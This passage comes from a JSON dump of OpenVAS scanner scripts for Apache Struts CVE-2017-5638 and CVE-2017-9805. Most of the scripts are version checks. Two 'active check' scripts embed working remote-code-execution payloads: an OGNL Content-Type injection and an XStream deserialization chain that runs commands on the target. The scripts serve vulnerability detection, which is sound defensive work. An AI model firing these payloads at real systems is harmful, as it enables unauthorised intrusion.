"http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as 
published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve a remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-2017-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free 
software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-2017-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve a remote code execution vulnerability via Apache Struts 2.\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. 
Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! 
build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", 
value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 
ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a specially crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. 
Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n 
\"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n # Cap the number of candidate URLs probed so the check does not run unbounded on large sites.\n x++;\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms 
of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 
09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T18:48:38", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2017-09-07T00:00:00", "type": "openvas", "title": "Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9805"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310811730", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811730", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811730\");\n script_version(\"2020-05-06T06:57:16+0000\");\n script_cve_id(\"CVE-2017-9805\");\n script_bugtraq_id(100609);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 06:57:16 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-07 16:39:09 +0530 (Thu, 07 Sep 2017)\");\n script_name(\"Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-052.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check\n whether we are able to execute arbitrary code or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within the REST plugin which\n is using an XStreamHandler with an instance of XStream for deserialization\n without any type 
filtering.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow\n an attacker to execute arbitrary code in the context of the affected application.\n Failed exploit attempts will likely result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.5 through 2.5.12,\n 2.1.2 through 2.3.33.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.5.13\n or 2.3.34 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port(default:8080);\nhost = http_host_name(dont_add_port:TRUE);\n\nforeach ext(make_list(\"action\", \"do\", \"jsp\")){\n exts = http_get_kb_file_extensions(port:port, host:host, ext:ext);\n if(exts && is_array(exts)){\n found = TRUE;\n break;\n }\n}\n\nif( ! found )\n exit( 0 );\n\nhost = http_host_name(port:port);\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nif(host_runs(\"Windows\") == \"yes\"){\n COMMAND = '<string>ping</string><string>-n</string><string>3</string><string>' + this_host() + '</string>';\n win = TRUE;\n}else{\n # For Linux and Unix platforms: embed a scanner-specific marker in the ICMP payload (-p)\n # so the captured echo request can be attributed to this check.\n vtstrings = get_vt_strings();\n check = vtstrings[\"ping_string\"];\n pattern = hexstr(check);\n COMMAND = '<string>ping</string><string>-c</string><string>3</string><string>-p</string><string>' + pattern + '</string><string>' + this_host() + '</string>';\n}\n\ndata =\n' <map>\n <entry>\n <jdk.nashorn.internal.objects.NativeString>\n <flags>0</flags>\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n <dataHandler>\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n <is class=\"javax.crypto.CipherInputStream\">\n <cipher class=\"javax.crypto.NullCipher\">\n <initialized>false</initialized>\n <opmode>0</opmode>\n 
<serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"java.util.Collections$EmptyIterator\"/>\n <next class=\"java.lang.ProcessBuilder\">\n <command>\n ' + COMMAND + '\n </command>\n <redirectErrorStream>false</redirectErrorStream>\n </next>\n </iter>\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n <method>\n <class>java.lang.ProcessBuilder</class>\n <name>start</name>\n <parameter-types/>\n </method>\n <name>foo</name>\n </filter>\n <next class=\"string\">foo</next>\n </serviceIterator>\n <lock/>\n </cipher>\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n <ibuffer/>\n <done>false</done>\n <ostart>0</ostart>\n <ofinish>0</ofinish>\n <closed>false</closed>\n </is>\n <consumed>false</consumed>\n </dataSource>\n <transferFlavors/>\n </dataHandler>\n <dataLen>0</dataLen>\n </value>\n </jdk.nashorn.internal.objects.NativeString>\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n <entry>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n </map>';\nlen = strlen(data);\nurl = '/struts2-rest-showcase/orders/3';\nreq = http_post_put_req( port: port,\n url: url,\n data: data,\n add_headers: make_array( 'Content-Type', 'application/xml'));\n\nres = send_capture( socket:soc,\n data:req,\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\nclose(soc);\n\nif(res && (win || check >< res)){\n report = \"It was possible to execute command remotely at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + \" with the command '\" + COMMAND + \"'.\";\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 
6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
